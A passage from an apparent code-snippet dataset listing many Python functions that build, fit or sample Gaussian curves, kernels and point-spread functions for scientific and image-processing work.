pixel value.\n offset0 = np.median(ordinate)\n # Guess that the scale is equal to the largest recorded value.\n scale0 = arr.max()\n params_0 = [mean0, sdev0, offset0, scale0]\n if bounds is 
None:\n bounds = ([0, 0, 0, 0],\n [ordinate.shape[0], ordinate.shape[0], scale0, scale0 * 10])\n\n # Perform the fitting.\n fit_popt_pcov = curve_fit(\n univariate_normal,\n np.arange(0, ordinate.shape[0], 1), ordinate, bounds=bounds,\n sigma=ordinate_e, p0=params_0, maxfev=2000 * (len(params_0) + 1))\n\n fit_info = FitInfo(fit_popt_pcov[0], fit_popt_pcov[1], univariate_normal)\n\n # Determine uncertainty from covarience matrix.\n # Note: the stddev of the fit Gaussian can be accessed via popt[1].\n p_sigma = np.sqrt(np.diag(fit_info.pcov))\n\n return BkgSubInfo(fit_info.popt[2], p_sigma[2], fit_gaussian_1d, fit_info)", "def gaussian(x, amp, wid, cen):\n return amp*np.exp(-(x-cen)**2/(2*wid**2))", "def gaussian(centre, k, intensity, xpos):\r\n\treturn intensity * np.exp(- np.power(k * (xpos - centre), 2))", "def makeGaussian(height, width, sigma=3, center=None):\n x = np.arange(0, width, 1, float)\n y = np.arange(0, height, 1, float)[:, np.newaxis]\n if center is None:\n x0 = width // 2\n y0 = height // 2\n else:\n x0 = center[0]\n y0 = center[1]\n\n return np.exp(-4 * np.log(2) * ((x - x0) ** 2 + (y - y0) ** 2) / sigma ** 2)", "def gaussian(x, sigma):\n try: r = np.exp(-0.5*(x/sigma)**2) \n except: r = np.zeros(len(x))\n return r", "def Gaussian(x,t,sigma):\n return np.exp(-(x-t)**2/(2*sigma**2))", "def womgau(hop):\n import numpy as np\n import logging\n import matplotlib.pyplot as plt\n from scipy.optimize import curve_fit\n from tmath.wombat.womwaverange import womwaverange\n from tmath.wombat.womget_element import womget_element\n from tmath.wombat.inputter import inputter\n from tmath.wombat.inputter_single import inputter_single\n from tmath.wombat.gauss import gauss\n from tmath.wombat.gauss_cont import gauss_cont\n from tmath.wombat.yesno import yesno\n print(' ')\n logging.info('Object is {}'.format(hop[0].obname))\n print(' ')\n print('Spectrum runs from {} to {}'.format(hop[0].wave[0],hop[0].wave[-1]))\n print(' ')\n print('This routine expects the spectrum to be in flambda units.')\n print('It also expects a linear wavelength scale.')\n print(' ')\n print('Choose general region of spectrum\\n')\n nwave,nflux,mode=womwaverange(hop[0].wave,hop[0].flux,'none')\n print('\\nNow pick the exact range for the fit')\n waveint,fluxint,mode=womwaverange(nwave,nflux,mode)\n indexblue=womget_element(nwave, waveint[0])\n indexred=womget_element(nwave,waveint[-1])\n if (mode == 'w'):\n done = False\n while (not done):\n print(' ')\n wavecenter=inputter('Enter approximate center of Gaussian : ','float',False)\n indexcenter=womget_element(waveint,wavecenter)\n if (indexcenter <= 0) or (wavecenter > waveint[-1]):\n print('Bad central wavelength, try again')\n else:\n done = True\n else:\n done=False\n while (not done):\n print('Mark the approximate center of the Gaussian')\n pickcent=plt.ginput(1,timeout=-1)\n indexcenter=womget_element(waveint,pickcent[0][0])\n print('\\nApproximate center at {}'.format(waveint[indexcenter]))\n print('\\nIs this OK?')\n answer=yesno('y')\n if (answer == 'y'):\n done=True\n weights=np.sqrt(hop[0].var[indexblue:indexred+1])\n print(' ')\n continuum=inputter_single('Do you want to fit gaussian with (c)ontinuum, or (n)o continuum? 
','cn')\n if (continuum == 'c'):\n p=[fluxint[indexcenter], waveint[indexcenter],3.0,1.0,waveint[0]]\n result=curve_fit(gauss_cont,waveint,fluxint,sigma=weights,p0=p,absolute_sigma=True,full_output=True)\n else:\n p=[fluxint[indexcenter], waveint[indexcenter],3.0]\n result=curve_fit(gauss,waveint,fluxint,sigma=weights,p0=p,absolute_sigma=True,full_output=True)\n coefferr=np.sqrt(np.diag(result[1]))\n coeff=result[0]\n # make 'finer-grained' version of fit, 0.2A/pix for calculations\n wavecalc=np.arange(2*5*50*abs(coeff[2]))*0.2+coeff[1]-0.2*5*50*abs(coeff[2])\n calccenter=womget_element(wavecalc,coeff[1])\n if (continuum == 'c'):\n fluxcalc=gauss_cont(wavecalc,*coeff)\n fluxcont=wavecalc*coeff[3]+coeff[4]\n fluxgaussian=fluxcalc-fluxcont\n linecont=fluxcont[calccenter]\n else:\n fluxcalc=gauss(wavecalc,*coeff)\n \n \n deltafit=wavecalc[1]-wavecalc[0]\n calcindexblue=womget_element(wavecalc,waveint[0])\n calcindexred=womget_element(wavecalc,waveint[-1])\n sumfluxcalc=np.sum(fluxcalc[calcindexblue:calcindexred+1]*deltafit)\n sumallfluxcalc=np.sum(fluxcalc*deltafit)\n chi=(result[2]['fvec']**2).sum()\n redchi=chi/(len(waveint)-len(coeff))\n if (continuum == 'c'):\n sumfluxgaussian=np.sum(fluxgaussian[calcindexblue:calcindexred+1]*deltafit)\n sumallfluxgaussian=np.sum(fluxgaussian*deltafit)\n sumfluxcont=np.sum(fluxcont[calcindexblue:calcindexred+1]*deltafit)\n sumallfluxcont=np.sum(fluxcont*deltafit)\n sumallfluxcont_test=np.sum(fluxcont)\n # propagate uncertainty (from old version) not sure this is correct\n height_pct=coefferr[0]/coeff[0]\n sigma_pct=coefferr[2]/coeff[2]\n flux_pct=np.sqrt(height_pct**2+sigma_pct**2)\n sumfluxgaussiansig=sumfluxgaussian*flux_pct\n sumallfluxgaussiansig=sumallfluxgaussian*flux_pct\n plt.cla()\n plt.plot(nwave,nflux,drawstyle='steps-mid',color='k')\n plt.ylabel('Flux')\n plt.xlabel('Wavelength')\n xmin,xmax=plt.xlim()\n ymin,ymax=plt.ylim()\n plt.plot(wavecalc,fluxcalc,drawstyle='steps-mid',color='b')\n if (continuum == 'c'):\n plt.plot(wavecalc,fluxgaussian,drawstyle='steps-mid',color='r')\n plt.plot(wavecalc,fluxcont,drawstyle='steps-mid',color='g')\n plt.plot([waveint[0],waveint[0]],[ymin,ymax],color='k',linestyle='--')\n plt.plot([waveint[-1],waveint[-1]],[ymin,ymax],color='k',linestyle='--')\n plt.xlim([xmin,xmax])\n plt.ylim([ymin,ymax])\n logging.info('For object {} Gaussian fit'.format(hop[0].obname))\n if (continuum == 'c'):\n print('\\nData = Black, Fit = Blue, Continuum = Green, Fit-Continuum = Red\\n')\n else:\n print('\\nData = Black, Fit = Blue\\n')\n logging.info('Height {:16.8f}+/-{:16.8f}'.format(coeff[0],coefferr[0]))\n logging.info('Center {:16.8f}+/-{:16.8f}'.format(coeff[1],coefferr[1]))\n logging.info('Sigma {:16.8f}+/-{:16.8f}'.format(coeff[2],coefferr[2]))\n if (continuum == 'c'):\n FWHM = 2.35482*np.abs(coeff[2])\n rest_wave = input('Rest wavelength [N/A]: ') or None\n redshift = input('Redshift [N/A]: ') or None\n if rest_wave:\n rest_wave = float(rest_wave)\n w1 = (rest_wave - FWHM/2.)/(1.+float(redshift)) \n w2 = (rest_wave + FWHM/2.)/(1.+float(redshift)) \n c = 299792.458\n v1 = -1.*c*((rest_wave/w1)**2. - 1)/(1+((rest_wave/w1)**2.))\n v2 = -1.*c*((rest_wave/w2)**2. 
- 1)/(1+((rest_wave/w2)**2.))\n logging.info('Slope {:16.8f}+/-{:16.8f}'.format(coeff[3],coefferr[3]))\n logging.info('Y-intercept {:16.8f}+/-{:16.8f}'.format(coeff[4],coefferr[4]))\n logging.info('FWHM {:16.8f}+/-{:16.8f}'.format(2.35482*np.abs(coeff[2]),2.35482*coefferr[2]))\n logging.info('FWHM (velocity) {:16.8f} km/s'.format(v2-v1))\n logging.info('Flux between dotted lines (Gaussian): {:16.8f}+/-{:16.8f}'.format(sumfluxgaussian, sumfluxgaussiansig))\n logging.info('EW between dotted lines (Gaussian): {:16.8f}'.format(sumfluxgaussian/linecont))\n logging.info('Flux for full (Gaussian): {:16.8f}+/-{:16.8f}'.format(sumallfluxgaussian, sumallfluxgaussiansig))\n logging.info('EW for full (Gaussian): {:16.8f}'.format(sumallfluxgaussian/linecont))\n logging.info('Continuum flux at line center: {:16.8f}'.format(linecont))\n\n \n logging.info('Chi^2: {}'.format(chi))\n logging.info('Reduced chi^2: {}'.format(redchi))\n logging.info('All fluxes might need to be scaled by 1e-15')\n print(' ')\n return hop", "def gaussian_likelihood(input_, mu_, log_std):\n pre_sum = -0.5 * (((input_ - mu_) / (\n tf.exp(log_std) + EPS)) ** 2 + 2 * log_std + np.log(\n 2 * np.pi))\n return tf.reduce_sum(pre_sum, axis=1)", "def gaussian(x, x0=0.0, fwhm=1.0, ampl=1.0):\n return ampl * np.exp(-4 * np.log(2) * ((x - x0) / fwhm) ** 2)", "def bigaussian(mu, wid, x, m = 0.5):\n lx = x.shape[0]\n ix = np.where(x == mu)[0][0]\n \n y = np.ones(lx)\n y[0:ix] = gaussian(mu, wid * m, x[0:ix])\n y[ix+1:lx] = gaussian(mu, wid * (1 - m), x[ix+1:lx]) \n \n return y", "def GaussianFit(data, title=\"\"):\n y, binEdges = np.histogram(data, 50)\n x = (binEdges[:-1] + binEdges[1:]) / 2\n x_width = (x[-1] - x[0]) / len(x)\n y_err = np.sqrt(y) # items in a bin should follow the Poisson distribution\n\n # calculate optimal fit parameters and covariance matrix using least squares method\n popt, cov = curve_fit(Gaussian, x, y, [np.mean(data), np.std(data), 10])\n\n # plot data\n plt.bar(x, y, x_width, yerr=y_err, color=\"blue\", edgecolor=\"black\", capsize=3, ecolor=\"black\")\n \n text1 = \"Mean (GeV): \" + str( round_to(popt[0], cov[0, 0]) ) + \" $\\pm$ \" + str( round_to(cov[0, 0], cov[0, 0]) )\n\n text2 = \"Standard deviation (GeV): \" + str( round_to(popt[1], cov[1, 1]) ) + \" $\\pm$ \" + str( round_to(cov[1, 1], cov[1, 1]) )\n\n text = '\\n'.join((text1, text2))\n\n # plot gaussian fit\n x_int = np.linspace(x[0], x[-1], 10*len(x)) # interpolate data\n y_int = Gaussian(x_int, *popt)\n plt.plot(x_int, y_int, label=\"Gaussian fit\", color=\"red\")\n\n\n plt.annotate(text, xy=(0.025, 0.8), xycoords='axes fraction')\n\n # plot options\n plt.legend()\n plt.xlabel(\"Energy (GeV)\")\n plt.ylabel(\"Number of events (bin width=\" + str(round(x_width, 2)) + \" GeV)\")\n plt.title(title)\n #plt.title(\"Beam momentum 100GeV, magnetic field \" + str(geometry.B) + \"T.\")\n \n # return some results, mean, standard deviation, amplitude\n return [popt[0], cov[0, 0]], [popt[1], cov[1, 1]], [popt[2], cov[2, 2]]", "def gaussian(self, amp_step, sigma_step):\n l = len(self.overlaid_x_axis)\n x = np.linspace(0, l, l) - l/2 # centre of data\n\n # This is new code to 'guess' the size of the Gaussian from the\n # existing data rather than from hard-coded numbers.\n # TODO: test this! 
Possibly link up to the get_windowed_data function\n # as it uses a lot of the same functionality\n trigger = self.pv_monitor.arrays[self.controls.Arrays.WAVEFORMS][0]\n trace = self.pv_monitor.arrays[self.controls.Arrays.WAVEFORMS][1]\n amplitude = max(trace) + amp_step\n diff = np.diff(trigger)\n stepvalue = 0.5\n if min(diff) > -1 * stepvalue or max(diff) < stepvalue:\n raise RangeError\n else:\n maxtrig = next(x for x in diff if x > stepvalue)\n mintrig = next(x for x in diff if x < -1 * stepvalue)\n edges = [np.where(diff == maxtrig)[0][0],\n np.where(diff == mintrig)[0][0]]\n half_trigger_length = (edges[1]-edges[0])\n sigma = half_trigger_length/4 + sigma_step\n\n gauss = self.ax2.plot(amplitude * np.exp(-x**2 / (2 * sigma**2)), 'r')\n self.overlaid_lines.append(gauss)\n self.draw()", "def makeGaussian(size, fwhm, sigma, center=None):\n\n x = np.arange(0, size, 1, float)\n y = x[:,np.newaxis]\n\n if center is None:\n x0 = y0 = size // 2\n else:\n x0 = center[0]\n y0 = center[1]\n \n #return (np.exp(-4*np.log(2) * ((x-x0)**2 + (y-y0)**2) / fwhm**2)) #approximation using exponenial functions\n return ((1/(2*np.pi*sigma**2))*np.exp(-((xx)**2 + (yy)**2)/(2*sigma**2))) # symmetric 2D Gaussian distribution", "def Gaussian(x, t, sigma):\n return np.exp(-(x - t)**2 / (2 * sigma**2))", "def fitbivarGaussian(data):\n params = bivarParams(data)\n errorfunction = lambda p: ravel(bivarGaussian(*p)(*indices(data.shape)) -\n data)\n p, success = optimize.leastsq(errorfunction, params)\n return p", "def gaussian(height, center_x, center_y, width_x, width_y):\n width_x = float(width_x)\n width_y = float(width_y)\n return lambda x,y: height*np.exp(\n -(((center_x-x)/width_x)**2+((center_y-y)/width_y)**2)/2)", "def gaussian(height, center_x, center_y, width_x, width_y):\n width_x = float(width_x)\n width_y = float(width_y)\n return lambda x,y: height*np.exp(\n -(((center_x-x)/width_x)**2+((center_y-y)/width_y)**2)/2)", "def gaussian(height, center_x, center_y, width_x, width_y):\n width_x = float(width_x)\n width_y = float(width_y)\n return lambda x,y: height*np.exp(\n -(((center_x-x)/width_x)**2+((center_y-y)/width_y)**2)/2)", "def _f_special_gauss(size, sigma):\n radius = size // 2\n offset = 0.0\n start, stop = -radius, radius + 1\n if size % 2 == 0:\n offset = 0.5\n stop -= 1\n x, y = np.mgrid[offset + start:stop, offset + start:stop]\n assert len(x) == size\n g = np.exp(-((x ** 2 + y ** 2) / (2.0 * sigma ** 2)))\n g /= g.sum()\n return tf.constant(g, dtype=tf.float32)", "def gaussian(window_size, sigma):\n gauss = torch.Tensor([math.exp(-(x - window_size//2)**2/float(2*sigma**2)) for x in range(window_size)])\n return gauss/gauss.sum()", "def gaussianPSF(shape, sigma):\n psf = dg.drawGaussiansXY(shape,\n numpy.array([0.5*shape[0]]),\n numpy.array([0.5*shape[1]]),\n sigma = sigma)\n return psf/numpy.sum(psf)", "def fit_ndgaussian(xdata, fdata):\n m, n = xdata.shape\n n2 = 2 * n\n fsuminv = 1 / numpy.sum(fdata)\n\n # Estimate initial parameters\n mean = fsuminv * numpy.sum(fdata * xdata.transpose(), axis=1)\n dx = (xdata - mean).transpose()\n cov = fsuminv * (fdata * dx).dot(dx.transpose())\n\n evals, evecs = linalg.eigh(cov)\n covdet = numpy.prod(evals)\n\n scale = fdata.max() * numpy.sqrt(covdet * (2 * numpy.pi) ** n)\n\n # Make sure the matrix of eigenvectors is orthogonal and proper (det +1)\n if linalg.det(evecs) < 0:\n evecs[:, 0] = -evecs[:, 0]\n\n ## Use the Cayley transform to extract n(n - 1) / 2 independent parameters\n ## from the orthogonal eigenvector matrix\n #eye = numpy.eye(n)\n 
#evecs_c = (eye - evecs).dot(linalg.inv(eye + evecs))\n #upper = numpy.triu_indices(n, k=1)\n\n # Use the parametrization in orthogonal_matrix()\n angles = angles_from_orthogonal_matrix(evecs)\n\n # Make a list with the minimal number of parameters to specify a Gaussian\n #params = numpy.hstack((scale, mean, numpy.sqrt(evals), evecs_c[upper]))\n params = numpy.hstack((scale, mean, numpy.sqrt(evals), angles))\n #params = numpy.hstack((numpy.sqrt(scale), mean, numpy.sqrt(evals),\n # angles))\n #params = numpy.hstack((scale, mean, evals, angles))\n\n def params_to_scale_mean_cov(params_):\n \"\"\"\n Extract the scale, mean and covariance matrix from the minimal\n parameter array\n\n \"\"\"\n # Extract scale and mean\n #scale_sqrt_ = params_[0]\n #scale_ = scale_sqrt_ * scale_sqrt_\n scale_ = params_[0]\n\n mean_ = params_[1:n + 1]\n\n # Get eigenvalues\n evals_sqrt_ = numpy.array(params_[n + 1:n2 + 1])\n evals_ = evals_sqrt_ * evals_sqrt_\n #evals_ = numpy.array(params_[n + 1:n2 + 1])\n\n ## Reconstruct the transformed eigenvector matrix\n #cov_c_ = numpy.zeros((n, n))\n #cov_c_[upper] = params_[n2 + 1:]\n #cov_c_.transpose()[upper] = -cov_c_[upper]\n #\n ## Use an inverse Cayley transform to get the true eigenvector matrix\n #evecs_ = (eye - cov_c_).dot(linalg.inv(eye + cov_c_))\n\n # Get eigenvector matrix from orthogonal_matrix()\n evecs_ = orthogonal_matrix_from_angles(n, params_[n2 + 1:])\n\n # Get the covariance matrix from the eigenvectors and eigenvalues\n cov_ = evecs_.dot(numpy.diag(evals_).dot(evecs_.transpose()))\n\n return scale_, mean_, cov_\n\n def param_gauss(xdata_, *params_):\n \"\"\"\n Define a Gaussian function specified by a minimal number of parameters\n\n \"\"\"\n scale_, mean_, cov_ = params_to_scale_mean_cov(params_)\n return scale_ * gaussian(xdata_, mean=mean_, cov=cov_)\n\n def error(params_):\n eps = fdata - param_gauss(xdata, *params_)\n return numpy.sum(eps * eps)\n\n # Find the parameter array that solves the least-squares fitting problem\n #params, __ = optimize.curve_fit(param_gauss, xdata, fdata, p0=params)\n l = n * (n - 1) // 2\n bounds = ([(0.0, None)] + # Scale must be positive\n [(None, None)] * n + # Means for each axis -- any value\n [(None, None)] * n + # Square roots of evals -- any value\n [(0.0, 2 * numpy.pi)] * l) # Angles constrained to one cycle\n params = optimize.minimize(error, params, bounds=bounds).x\n\n scale, mean, cov = params_to_scale_mean_cov(params)\n\n return scale, mean, cov", "def generate_gaussian():\n amp = 10 * numpy.random.chisquare(3)\n width = numpy.random.chisquare(3)\n mean = numpy.random.uniform(-10 + width, 10 - width)\n x = numpy.linspace(-10, 10, 500)\n y = amp * numpy.exp(- (x - mean) ** 2 / width ** 2)\n add_noise(y, 0.1)\n return x, y", "def gaussian_likelihood(x, mu, log_std):\n prob = -0.5 * (((x - mu) / (tf.exp(log_std) + EPS)) ** 2 + 2 * log_std + np.log(2 * np.pi))\n return tf.reduce_sum(prob, axis=1)", "def gaussian_kernel(windowX, windowY, sigma):\n X,Y = createKernalWindowRanges(windowX, windowY, increment)\n \n gKernel = gaussianNormalised(X, 0, sigma) * gaussianNormalised(Y, 0, sigma)\n gSum = np.sum(np.abs(gKernel))\n \n if gSum == 0:\n print \"Warning gaussian_kernel:: Not normalising by sum of values, as sum = \" + str(gSum)\n return (gKernel)\n else:\n return (gKernel / gSum)", "def add_gaussian(self, A=1000, sigma=(200, 200), x0=None):\n if x0 is None:\n x0 = self._beam_position\n \n self.map += np.asarray(np.round(\n gaussian2d(self._X, self._Y, A, sigma, x0)), dtype=np.int32)", "def gaussian(height, 
center_x, center_y, width_x, width_y):\n width_x = float(width_x)\n width_y = float(width_y)\n return lambda x,y: height*exp(\n -(((center_x-x)/width_x)**2+((center_y-y)/width_y)**2)/2)", "def gaussian_decay(A, sigma, x, y):\n return A * math.exp(-((pow(x-16.,2.)/(2*pow(sigma,2)) + \\\n (pow(y-16.,2.)/(2*pow(sigma,2))))))", "def wrapper_fit_func(x, ntraps, *args):\n a, b, c = list(args[0][:ntraps]), list(args[0][ntraps:2 * ntraps]), list(args[0][2 * ntraps:3 * ntraps])\n offset = args[0][-1]\n return gaussianarray1d(x, a, b, c, offset, ntraps)", "def gaussian(height, center_x, center_y, width_x, width_y):\n width_x = float(width_x)\n width_y = float(width_y)\n return lambda x,y: height*np.exp(-(((center_x-x)/width_x)**2+((center_y-y)/width_y)**2)/2)", "def fit_gauss(x, y):\n nx = numpy.array(x)\n ny = numpy.array(y)\n ne = numpy.ones(len(ny))\n#\n#--- we need to give an initial guess\n#\n ymax = numpy.max(ny)\n med = find_med(y)\n p0 = [ymax, med, 10, 0]\n\n fitobj = kmpfit.Fitter(residuals=residualsG, data=(nx,ny,ne))\n fitobj.fit(params0=p0)\n [amp, cent, width, floor] = fitobj.params\n\n return [amp, cent, width]", "def fit_gaussian(x, y, z):\n\n def sym_gaussian(p):\n \"\"\"\n Returns a Gaussian function:\n a**2 * exp(-((x - x_0)**2 + (y - y_0)**2) / (2 * sigma**2))\n p = [a, x_0, y_0, sigma]\n \"\"\"\n a, x_0, y_0, sigma = p\n return a**2 \\\n * np.exp(-((x - x_0)**2 + (y - y_0)**2) / (2.0 * sigma**2))\n\n def sym_gaussian_resids(p):\n \"\"\"Residuals to be sent into leastsq\"\"\"\n return z - sym_gaussian(p)\n\n def guess_fit_gaussian():\n \"\"\"\n return a, x_0, y_0, and sigma based on computing moments of data\n \"\"\"\n a = z.max()\n\n # Compute moments\n total = z.sum()\n x_0 = np.dot(x, z) / total\n y_0 = np.dot(y, z) / total\n\n # Approximate sigmas\n sigma_x = np.dot(x**2, z) / total\n sigma_y = np.dot(y**2, z) / total\n sigma = np.sqrt(sigma_x * sigma_y)\n\n # Return guess\n return (a, x_0, y_0, sigma)\n\n # Get guess\n p0 = guess_fit_gaussian()\n\n # Perform optimization using nonlinear least squares\n popt, junk_output, info_dict, mesg, ier = \\\n scipy.optimize.leastsq(sym_gaussian_resids, p0, full_output=True)\n\n # Check to make sure leastsq was successful. 
If not, return centroid\n # estimate.\n if ier in (1, 2, 3, 4):\n return (popt[0]**2, popt[1], popt[2], popt[3])\n else:\n return p0", "def GaussianKernel(sigma: float = 1., width: int = 0):\n assert not ((width is None or width == 0) and\n (sigma is None or sigma == 0)), \\\n \"GaussianKernel :: both sigma ({}) & width ({}) are not valid\".format(\n sigma, width)\n\n if width is None or width == 0:\n width = int(2.0 * 3.0 * sigma + 1.0)\n if width % 2 == 0:\n width += 1\n\n if sigma is None or sigma == 0:\n sigma = (width - 1)/6.\n half = width//2\n x, y = np.meshgrid(np.linspace(-half, half, width),\n np.linspace(-half, half, width), indexing='xy')\n w = np.exp(- (x**2 + y**2) / (2.*(sigma**2)))\n w /= np.sum(w)\n return torch.from_numpy(w.astype(np.float32)).view(1, 1, width, width)", "def sampleGaussian(self, mu, log_sigma):\n # reparameterization trick\n epsilon = tf.random_normal(tf.shape(log_sigma), name=\"epsilon\")\n return mu + epsilon * tf.exp(log_sigma) # N(mu, I * sigma**2)", "def gauss_smooth(data, sigma):\n\t\t\t# make the kernel 5 sigmas wide in each direction\n\t\t\tkernel = stats.norm.pdf(np.arange(-5*sigma, (5*sigma)+1), scale=sigma)\n\t\t\t\n\t\t\treturn sp.ndimage.convolve1d(data, kernel, axis=2)", "def _FSpecialGauss(size, sigma):\n radius = size // 2\n offset = 0.0\n start, stop = -radius, radius + 1\n if size % 2 == 0:\n offset = 0.5\n stop -= 1\n x, y = np.mgrid[offset + start:stop, offset + start:stop]\n assert len(x) == size\n g = np.exp(-((x**2 + y**2)/(2.0 * sigma**2)))\n return g / g.sum()", "def flat_top_gaussian(a1_val, a2_val, sigma1, sigma2, w1_val, w2_val, w_val):\n gauss1 = a1_val * np.exp(-(w_val - w1_val)**4/(2 * sigma1**2))\n gauss2 = a2_val * np.exp(-(w_val - w2_val)**4/(2 * sigma2**4))\n sum_gauss = gauss1 + gauss2\n return sum_gauss", "def gaussian2d(x, y, A, sigma, x0):\n Z = A * np.exp(-( (x-x0[0])**2/(2*sigma[0]**2) + (y-x0[1])**2/(2*sigma[1]**2)))\n return Z", "def fit_psf_to_gaussian(self, xx, yy, psf_data, x0, y0, sigmax0, sigmay0):\n peak0, offset0 = 1.0, 0.0 # Guesses\n # # We guess that the FWHM will be around 2 detector pixels [30 microns]\n # # Using the formula for a Gaussian FWHM = 2 sqrt(2 ln(2)) Sigma\n # sigma_fwhm = 100e-3 / 2 * np.sqrt(2 * np.log(2))\n # sigmax0, sigmay0 = sigma_fwhm, sigma_fwhm\n\n guess_param = [x0, y0, sigmax0, sigmay0, peak0, offset0]\n bounds = ([-np.inf, -np.inf, 0.0, 0.0, 0, -np.inf],\n [np.inf, np.inf, np.inf, np.inf, np.inf, np.inf])\n\n while True:\n # The Gaussian fit can sometimes fail if our guess for the size of the PSF is very wrong\n try:\n pars, cov = curve_fit(self.gaussian2d, (xx.ravel(), yy.ravel()), psf_data.ravel(),\n p0=guess_param, bounds=bounds)\n # Results of the fit for the sigmaX, sigmaY\n sigmaX, sigmaY = pars[2], pars[3]\n # print(\"Successful Guassian Fit\")\n break\n\n except RuntimeError: # If it fails to converge, repeat with a randomly perturbed guess\n # sigmaX, sigmaY = np.nan, np.nan\n print(\"\\n[WARNING] Gaussian Fit of the PSF failed!\")\n\n # try with other guesses\n deltax = np.random.uniform(low=-1.0, high=1.0)\n deltay = np.random.uniform(low=-1.0, high=1.0)\n new_sigmax0 = (1 + deltax) * sigmax0\n new_sigmay0 = (1 + deltay) * sigmay0\n print(\"Trying with new Sigmas: X %.3f & Y %.3f microns\" % (1e3 * new_sigmax0, 1e3 * new_sigmay0))\n guess_param = [x0, y0, new_sigmax0, new_sigmay0, peak0, offset0]\n\n # Use the formula for the Gaussian FWHM to transform the sigmas into FWHM values\n fwhm_x = 2 * np.sqrt(2 * np.log(2)) * sigmaX * 1000\n fwhm_y = 2 * np.sqrt(2 * 
np.log(2)) * sigmaY * 1000\n\n return fwhm_x, fwhm_y", "def gaussian_sigma(t, params):\n t_final = tf.cast(params['t_final'].get_value(), dtype=tf.float64)\n sigma = tf.cast(params['sigma'].get_value(), dtype=tf.float64)\n gauss = tf.exp(-(t - t_final / 2) ** 2 / (2 * sigma ** 2))\n norm = (tf.sqrt(2 * np.pi * sigma ** 2)\n * tf.math.erf(t_final / (np.sqrt(8) * sigma))\n - t_final * tf.exp(-t_final ** 2 / (8 * sigma ** 2)))\n offset = tf.exp(-t_final ** 2 / (8 * sigma ** 2))\n return (gauss - offset) / norm", "def gaus(x, A, mu, sigma):\n return A * np.exp(-(x - mu) ** 2 / (2. * sigma ** 2))", "def expgaussian(mu, wid, timeconstant, x): \n # Gaussian signal broadened by an exponetial signal\n g = gaussian(mu, wid, x)\n \n hly = np.round( len(g) / 2.0 )\n ey = np.r_[np.zeros(hly),g,np.zeros(hly)]\n fy = np.fft.fft(ey)\n a = np.exp(-(np.arange(len(fy))) / timeconstant )\n fa = np.fft.fft(a)\n fy1 = fy * fa\n ybz = np.real(np.fft.ifft(fy1)) / np.sum(a)\n yb = ybz[hly:len(ybz)-hly]\n \n return yb", "def gauss_fit(seld, data=''):\n mean, std = norm.fit(data)\n return mean, std", "def make_gaussian(size, sigma=10, center=None):\n\n x = np.arange(0, size[1], 1, float)\n y = np.arange(0, size[0], 1, float)\n y = y[:, np.newaxis]\n\n if center is None:\n x0 = y0 = size[0] // 2\n else:\n x0 = center[0]\n y0 = center[1]\n\n return np.exp(-4 * np.log(2) * ((x - x0) ** 2 + (y - y0) ** 2) / sigma ** 2)", "def gaussian(t, params):\n DeprecationWarning(\"Using standard width. Better use gaussian_sigma.\")\n params['sigma'] = Qty(\n value=params['t_final'].get_value()/6,\n min_val=params['t_final'].get_value()/8,\n max_val=params['t_final'].get_value()/4,\n unit=params['t_final'].unit\n )\n return gaussian_sigma(t, params)", "def add_gaussian_noise(X, mu=0, sigma=0.1):\n noise = np.random.normal(0.0, sigma, size=X.size)\n return X + noise.reshape(X.shape)", "def gaussian2d(x, amplitude=1.0, center_x=0.0, sigma_x=1.0, center_y=0.0, sigma_y=1.0, rota=0.0):\n \n if len(x) == 1:\n y = x\n else:\n (x, y) = x\n \n if not sigma_y:\n sigma_y = sigma_x\n \n if not center_y:\n center_y = center_x\n \n if rota:\n center_x = center_x*np.cos(np.deg2rad(rota)) - center_y*np.sin(np.deg2rad(rota))\n center_y = center_x*np.sin(np.deg2rad(rota)) + center_y*np.cos(np.deg2rad(rota)) \n \n x = x*np.cos(np.deg2rad(rota)) - y*np.sin(np.deg2rad(rota))\n y = x*np.sin(np.deg2rad(rota)) + y*np.cos(np.deg2rad(rota))\n \n norm = 2.*np.pi*sigma_x*sigma_y\n #exp_x = np.power((x - center_x)/(sigma_x), 2.)\n #exp_y = np.power((y - center_y)/(sigma_y), 2.)\n g = amplitude*np.exp(-(((center_x - x)/sigma_x)**2 + \\\n ((center_y - y)/sigma_y)**2)/2.)\n \n return g #(amplitude/norm)*np.exp(-(exp_x + exp_y)/2.)", "def _beam_fit_fn_(z, d0, z0, Theta):\n return d0**2 + (Theta*(z-z0))**2", "def gaussian(T, Y, X, t, y, x, sigma, sigma_t=1):\n const_value = np.sqrt(2 * np.pi * sigma) ** 3\n norm = np.exp(\n -(\n ((X - x) ** 2) / (2 * sigma ** 2)\n + ((Y - y) ** 2) / (2 * sigma ** 2)\n + ((T - t) ** 2) / (2 * sigma_t ** 2)\n )\n )\n return norm / const_value", "def fitgaussian3d(data):\n \n params = moments3d(data)\n # Error function is simple difference between gaussian function and data.\n errorfunction = lambda p: np.ravel(gaussian3d(*p)(*np.indices(data.shape)) -\n data)\n opt = optimize.least_squares(errorfunction, params, bounds=([0,0,0,-np.inf, -np.inf,-np.inf,-np.inf],[data.shape[0]-1,data.shape[1]-1,data.shape[2]-1,np.inf,np.inf,np.inf,np.inf]))\n # Make all widths positive (negative values are equally valid but less useful downstream).\n 
for i in range(4,7):\n opt.x[i] = abs(opt.x[i])\n return opt", "def gauss(self, X, xm, amp, w):\n return amp * np.exp(-((X - xm) / w) ** 2)", "def makeGaussian(size, fwhm, center=None):\n\n x = sp.arange(0, size, 1, float)\n y = x[:,sp.newaxis]\n\n if center is None:\n x0 = y0 = size // 2\n else:\n x0 = center[0]\n y0 = center[1]\n\n return sp.exp(-4*sp.log(2) * ((x-x0)**2 + (y-y0)**2) / fwhm**2)", "def gaussianDist(self, x, mu, var):\n val = 1/(math.sqrt(2 * math.pi * var)) * math.exp(-1 * (x - mu)**2 / (2*var))\n return val", "def Gaussiankernel(size, sigma=1): \n size = int(size) // 2\n # create x grid and y grid\n x, y = np.mgrid[-size:size+1, -size:size+1] \n # gaussian distribution formula\n normal = 1 / np.sqrt(2.0 * np.pi * sigma**2)\n g = np.exp(-((x**2 + y**2) / (2.0*sigma**2))) * normal\n \n return g/g.sum()", "def makeGaussianKernel(sigma: float) -> np.ndarray:\n\n # Your code here.\n kernel_size = 8*sigma+1\n kernel = np.zeros([kernel_size,kernel_size], dtype=float)\n center = kernel_size//2\n \n \n s = 2*(sigma**2)\n sum_val = 0\n for i in range(0,kernel_size):\n for j in range(0,kernel_size):\n x = i-center\n y = j-center\n kernel[i,j] = np.exp(-(x**2+y**2) / s)\n sum_val += kernel[i,j]\n #/(np.pi * s)\n sum_val = 1/sum_val\n print(\"here is 